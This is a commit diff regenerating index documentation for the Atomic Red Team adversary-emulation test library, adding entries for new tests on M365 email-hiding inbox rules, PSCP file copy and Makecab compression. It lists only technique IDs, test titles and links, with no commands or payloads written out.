Generated docs from job=generate-docs branch=master [ci skip]

2024-09-24 21:43:47 +00:00
parent 2e9bea8316
commit d9bd7044e2
32 changed files with 535 additions and 29 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1648-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1651-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)

 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
@@ -35,6 +35,7 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
 defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
+defense-evasion,T1564.008,Hide Artifacts: Email Hiding Rules,1,New-Inbox Rule to Hide E-mail in M365,30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9,powershell
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
 defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
@@ -1376,6 +1377,7 @@ command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request dow
 command-and-control,T1105,Ingress Tool Transfer,30,Arbitrary file download using the Notepad++ GUP.exe binary,66ee226e-64cb-4dae-80e3-5bf5763e4a51,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,31,File download via nscurl,5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c,sh
 command-and-control,T1105,Ingress Tool Transfer,32,File Download with Sqlcmd.exe,6934c16e-0b3a-4e7f-ab8c-c414acd32181,powershell
+command-and-control,T1105,Ingress Tool Transfer,33,Remote File Copy using PSCP,c82b1e60-c549-406f-9b00-0a8ae31c9cfe,command_prompt
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh
@@ -1392,6 +1394,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compress
 collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
 collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
+collection,T1560.001,Archive Collected Data: Archive via Utility,11,Compress a File for Exfiltration using Makecab,2a7bc405-9555-4f49-ace2-b2ae2941d629,command_prompt
 collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
@@ -938,6 +938,7 @@ command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b172
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,30,Arbitrary file download using the Notepad++ GUP.exe binary,66ee226e-64cb-4dae-80e3-5bf5763e4a51,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,32,File Download with Sqlcmd.exe,6934c16e-0b3a-4e7f-ab8c-c414acd32181,powershell
+command-and-control,T1105,Ingress Tool Transfer,33,Remote File Copy using PSCP,c82b1e60-c549-406f-9b00-0a8ae31c9cfe,command_prompt
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -946,6 +947,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data
 collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
+collection,T1560.001,Archive Collected Data: Archive via Utility,11,Compress a File for Exfiltration using Makecab,2a7bc405-9555-4f49-ace2-b2ae2941d629,command_prompt
 collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
@@ -26,7 +26,7 @@
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # defense-evasion
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -48,7 +48,8 @@
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1006 Direct Volume Access](../../T1006/T1006.md)
  - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1564.008 Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md)
+  - Atomic Test #1: New-Inbox Rule to Hide E-mail in M365 [azure-ad]
 - T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1014 Rootkit](../../T1014/T1014.md)
  - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
@@ -1880,6 +1881,7 @@
  - Atomic Test #30: Arbitrary file download using the Notepad++ GUP.exe binary [windows]
  - Atomic Test #31: File download via nscurl [macos]
  - Atomic Test #32: File Download with Sqlcmd.exe [windows]
+  - Atomic Test #33: Remote File Copy using PSCP [windows]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
  - Atomic Test #1: Steganographic Tarball Embedding [windows]
@@ -1905,6 +1907,7 @@
  - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
  - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
+  - Atomic Test #11: Compress a File for Exfiltration using Makecab [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
  - Atomic Test #1: Screencapture [macos]
  - Atomic Test #2: Screencapture (silent) [macos]
@@ -23,7 +23,7 @@
  - Atomic Test #13: Chown through c script [macos, linux]
  - Atomic Test #14: Chown through c script (freebsd) [linux]
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1014 Rootkit](../../T1014/T1014.md)
  - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
@@ -17,7 +17,7 @@
  - Atomic Test #11: Chmod through c script [macos, linux]
  - Atomic Test #13: Chown through c script [macos, linux]
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
@@ -38,7 +38,7 @@
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # defense-evasion
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -28,7 +28,7 @@
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1006 Direct Volume Access](../../T1006/T1006.md)
  - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1318,6 +1318,7 @@
  - Atomic Test #29: iwr or Invoke Web-Request download [windows]
  - Atomic Test #30: Arbitrary file download using the Notepad++ GUP.exe binary [windows]
  - Atomic Test #32: File Download with Sqlcmd.exe [windows]
+  - Atomic Test #33: Remote File Copy using PSCP [windows]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
  - Atomic Test #1: Steganographic Tarball Embedding [windows]
@@ -1335,6 +1336,7 @@
  - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
  - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
+  - Atomic Test #11: Compress a File for Exfiltration using Makecab [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
  - Atomic Test #7: Windows Screencapture [windows]
  - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
@@ -7,7 +7,7 @@
 | Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to 